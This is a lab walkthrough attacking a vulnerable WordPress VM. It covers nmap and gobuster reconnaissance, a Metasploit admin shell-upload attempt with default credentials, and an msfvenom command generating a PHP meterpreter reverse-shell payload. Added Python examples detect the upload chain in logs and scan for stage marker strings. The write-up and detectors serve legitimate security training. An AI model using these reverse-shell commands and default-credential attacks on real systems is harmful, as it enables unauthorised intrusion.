1. Information gathering
1.1 Port scanning
Use netdiscover or arp to obtain the target IP (192.168.57.137), then use nmap to enumerate the open ports:
kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:41 CST
Nmap scan report for 192.168.57.137
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:F8:60:F0 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.88 seconds
Looking at the ports found: OpenSSH is usually hard to exploit, version-specific vulnerabilities in the other services come next, so the web application is the first thing to examine.
1.2 Directory scanning
Use gobuster to run a directory scan against port 80:
kali@kali:~$ gobuster dir -u http://192.168.57.137 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.57.137
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/23 12:44:57 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/upload (Status: 301)
/wordpress (Status: 301)
===============================================================
2020/12/23 12:45:00 Finished
===============================================================
The scan shows a WordPress application is present.
2. Exploitation attempts
The WordPress application uses the default username and password, so try the msf file upload module:
kali@kali:~$ msfconsole
=[ metasploit v6.0.16-dev ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Open an interactive Ruby terminal with irb
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.57.137
rhosts => 192.168.57.137
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress/
targeturi => /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.57.200
lhost => 192.168.57.200
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.57.200:4444
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
The module cannot exploit successfully, so try writing the shellcode into the web interface by hand to get a reverse shell.
2.1 Generating the malicious payload
Use msfvenom to generate the payload. Since a PHP-format file cannot be generated directly, output the payload raw to the terminal. The payload chosen here must be the same one used by the listener:
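From the defender's side, what the wp_admin_shell_upload module does leaves a recognisable chain in the Apache access log: a POST to wp-login.php, then a POST to wp-admin/update.php with action=upload-plugin, then a request for a freshly dropped .php file under wp-content/plugins/. The Python below is an added example, not code from the original writeup; the log lines are constructed, and the exact request paths are an assumption about how the module behaves rather than something the writeup shows.

```python
import re
from datetime import datetime, timedelta

# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not captured from the target): one client logs in,
# uploads a plugin and hits the dropped file; another client just logs in.
SAMPLE_LOG = """\
192.168.57.200 - - [23/Dec/2020:12:50:01 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "-"
192.168.57.200 - - [23/Dec/2020:12:50:02 +0800] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 3120 "-" "-"
192.168.57.200 - - [23/Dec/2020:12:50:03 +0800] "GET /wordpress/wp-content/plugins/xyz/abc.php HTTP/1.1" 200 0 "-" "-"
192.168.57.50 - - [23/Dec/2020:12:55:10 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "-"
192.168.57.50 - - [23/Dec/2020:12:56:00 +0800] "GET /wordpress/wp-admin/ HTTP/1.1" 200 5000 "-" "-"
"""

def parse(line):
    # (ip, ts, method, path, status) or None when the line is not in this format
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_plugin_upload_chains(log_text, window=timedelta(minutes=5)):
    """One alert per client that POSTs to wp-login.php and then uploads a plugin
    within `window`; a later GET of a .php under wp-content/plugins/ from the same
    client within `window` of the upload is recorded as the executed drop."""
    by_ip = {}
    for ev in map(parse, log_text.splitlines()):
        if ev:
            by_ip.setdefault(ev[0], []).append(ev)
    alerts = []
    for ip, events in by_ip.items():
        login_ts, upload_ts, alert = None, None, None
        for _, ts, method, path, _ in sorted(events, key=lambda e: e[1]):
            route = path.split("?")[0]          # path without the query string
            if method == "POST" and route.endswith("/wp-login.php"):
                login_ts = ts
            elif (method == "POST" and route.endswith("/wp-admin/update.php")
                  and "action=upload-plugin" in path and login_ts
                  and ts - login_ts <= window):
                upload_ts = ts
                alert = {"ip": ip, "login": login_ts.isoformat(),
                         "upload": ts.isoformat(), "executed": None}
                alerts.append(alert)
            elif (method == "GET" and alert and "/wp-content/plugins/" in route
                  and route.endswith(".php") and ts - upload_ts <= window):
                alert["executed"] = route
    return alerts
```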
kali@kali:~$ msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.57.200 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34281 bytes
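On the defensive side, the raw stage that msfvenom prints is recognisable in a web root by a handful of literal strings it always carries (the /*<?php /**/ opener, the "Evaling main meterpreter stage" message, the PAYLOAD_UUID and SESSION_GUID defines, the core_channel_open registration). The Python below is an added example and not part of the original writeup; the sample web root it builds is constructed, and the abridged stage fragment placed in it is not a working payload.

```python
import os
import tempfile

# Literal strings present in the raw php/meterpreter_reverse_tcp stage as msfvenom
# prints it; each is weak alone, so a file is flagged only when several match.
STAGE_MARKERS = [
    "/*<?php /**/",
    "Evaling main meterpreter stage",
    "$GLOBALS['channel_process_map']",
    'define("PAYLOAD_UUID"',
    'define("SESSION_GUID"',
    "register_command('core_channel_open'",
]

def matched_markers(content):
    """Return the stage markers present in one file's text."""
    return [m for m in STAGE_MARKERS if m in content]

def scan_webroot(root, min_markers=2, max_bytes=2_000_000):
    """Walk a web root and return {relative/path: [markers]} for every file with at
    least `min_markers` stage markers. All extensions are checked: a dropped stage
    need not be named *.php, and the raw stage starts with a comment, not <?php."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.getsize(full) > max_bytes:
                continue
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = matched_markers(fh.read())
            if len(hits) >= min_markers:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

def demo():
    """Constructed sample web root: a normal plugin file plus a file holding an
    abridged, non-functional fragment of the stage's first lines (hypothetical)."""
    root = tempfile.mkdtemp()
    plugin = os.path.join(root, "wp-content", "plugins", "hello")
    os.makedirs(plugin)
    with open(os.path.join(plugin, "hello.php"), "w") as fh:
        fh.write("<?php\n/* Plugin Name: Hello */\nfunction hello() { return 'hi'; }\n")
    with open(os.path.join(plugin, "x.php"), "w") as fh:
        fh.write("/*<?php /**/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); }\n"
                 "my_print(\"Evaling main meterpreter stage\"); define(\"PAYLOAD_UUID\", \"...\");\n")
    return scan_webroot(root)
```

Running the scanner on a real web root and diffing its output against a known-good baseline (or against a package manifest) turns the marker list into a periodic integrity check.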